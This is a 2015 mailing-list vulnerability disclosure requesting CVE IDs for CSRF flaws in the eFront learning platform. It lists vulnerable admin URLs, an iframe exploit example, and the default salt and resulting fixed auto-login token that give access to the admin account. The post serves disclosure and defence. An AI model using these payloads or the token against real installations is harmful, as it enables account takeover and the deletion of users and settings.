Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 8 Feb 2015 10:00:00 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- eFront v. 3.6.15.2 build 18021 (Community Edition) --
 Multiple CSRF vulnerabilities

Hi Steve, Josh, vendors, list.

I found multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (build 18021),
Community Edition.

Technical details:

The vulnerabilities can be found in different modules that are all used in
the administrator.php file:

ctg=modules (delete and deactivate/activate modules):

http://
{TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax

ctg=users (delete and deactivate/activate users):

http://
{TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax

ctg=themes (activate/deactivate and delete themes):

http://
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax

ctg=digest (deactivate/activate and delete events, e.g. deactivate user
registration, deactivate email for account activation)

e.g. EVENT_ID 3 = user email activation
e.g. EVENT_ID 4 = user registration

http://
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1

ctg=languages (deactivate/activate and delete language settings)

e.g. LANGUAGE_NAME = german

http://
{TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax
http://
{TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax


Exploit-Example (valid for all above listed vulnerabilities):

<iframe src="http://
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1"></iframe>


The following CSRF-vulnerability can be abused to activate/deactivate the
auto-login feature of an arbitrary user:

http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax


That makes it possible to login via a URL in an arbitrary user-account like
in the following example without providing any login-credentials:

http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN}

eFront creates three standard user-accounts while the installation process.
One of it is the administrators account.

The components being used for creating the auto-login token are the
following informations:

- a salt
- the accounts creation date
- the username

The salt isn't generated dynamically during the installation. On a common
eFront installation without any changes by the administrator, it has the
value cDWQR#$Rcxsc. The admin accounts creation date has the standard value
1365149958.

As the standard administrators accountname is "admin", the auto-login token
for the administrators account of eFront has always the value
eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that
none of the above mentioned values were changed after the installation.

That makes it possible for an attacker to abuse the CSRF-vulnerability to
gain access to the administrators account.



Can I have a CVE-ID / CVE-IDs for the issue(s)?

Thank you very much!

Greetings from Germany.

Steffen Rösemann

References:

[1] http://www.efrontlearning.net
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-09.html
[3] https://github.com/epignosis/efront_open_source/issues/7
[4]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-09.html
[5] http://seclists.org/fulldisclosure/2015/Feb/30

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ